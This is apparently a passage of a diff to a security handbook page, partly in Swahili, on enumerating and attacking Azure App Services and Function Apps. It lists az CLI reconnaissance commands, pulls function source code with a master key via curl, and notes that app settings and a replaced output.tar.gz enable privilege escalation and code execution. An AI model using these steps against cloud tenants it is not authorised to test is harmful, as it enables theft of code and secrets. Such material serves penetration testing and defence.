## If "linuxFxVersion" has something like: "DOCKER|mcr.microsoft.com/..."
## This is using a container
# Get connections of a webapp
az webapp conection list --name <name> --resource-group <res-group>
# Get details about the source of the function code
az functionapp deployment source show \
--name <app-name> \
--resource-group <res-group>
## If error like "This is currently not supported."
## Then, this is probalby using a container
# Get more info if a container is being used
az functionapp config container show \
--name <name> \
--resource-group <res-group>
# Get settings (and privesc to the sorage account)
az functionapp config appsettings list --name <app-name> --resource-group <res-group>
# Check if a domain was assigned to a function app
az functionapp config hostname list --webapp-name <app-name> --resource-group <res-group>
# Get SSL certificates
az functionapp config ssl list --resource-group <res-group>
# Get network restrictions
az functionapp config access-restriction show --name <app-name> --resource-group <res-group>
# Get more info about a function (invoke_url_template is the URL to invoke and script_href allows to see the code)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
# Get source code with Master Key of the function
curl "<script_href>?code=<master-key>"
## Python example
curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=<master-key>" -v
# Get source code
az rest --url "https://management.azure.com/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
# Get hybrid-connections of a webapp
az webapp hybrid-connections list --name <name> --resource-group <res-group>
```
{{#endtab }}
@@ -196,6 +232,40 @@ git clone 'https://<username>:<password>@name.scm.azurewebsites.net/repo-name.gi
../az-privilege-escalation/az-app-services-privesc.md
{{#endref}}
## Mifanozo ya kuunda Web Apps
### Python kutoka kwa eneo
Hii tutorial inategemea ile kutoka [https://learn.microsoft.com/en-us/azure/app-service/quickstart-python](https://learn.microsoft.com/en-us/azure/app-service/quickstart-python?tabs=flask%2Cwindows%2Cazure-cli%2Cazure-cli-deploy%2Cdeploy-instructions-azportal%2Cterminal-bash%2Cdeploy-instructions-zip-azcli).
```bash
# Clone repository
git clone https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart
cd msdocs-python-flask-webapp-quickstart
# Create webapp from this code
az webapp up --runtime PYTHON:3.9 --sku B1 --logs
```
Kuingia kwenye lango la SCM au kuingia kupitia FTP inawezekana kuona katika `/wwwroot` faili iliyo na muundo `output.tar.gz` ambayo ina msimbo wa webapp.
> [!TIP]
> Kuungana tu kupitia FTP na kubadilisha faili `output.tar.gz` haitoshi kubadilisha msimbo unaotekelezwa na webapp.
**Mshambuliaji anaweza kupakua faili hii, kuibadilisha, na kuipakia tena ili kutekeleza msimbo wowote katika webapp.**
### Python kutoka Github
Mafunzo haya yanategemea yale ya awali lakini yanatumia hazina ya Github.
1. Fork hazina msdocs-python-flask-webapp-quickstart katika akaunti yako ya Github.
2. Unda Web App mpya ya python katika Azure.
3. Katika `Deployment Center` badilisha chanzo, ingia na Github, chagua hazina iliyoforked na bonyeza `Save`.
Kama katika kesi ya awali, kuingia kwenye lango la SCM au kuingia kupitia FTP inawezekana kuona katika `/wwwroot` faili iliyo na muundo `output.tar.gz` ambayo ina msimbo wa webapp.
> [!TIP]
> Kuungana tu kupitia FTP na kubadilisha faili `output.tar.gz` na kuanzisha tena uanzishaji haitoshi kubadilisha msimbo unaotekelezwa na webapp.
## Marejeleo
- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)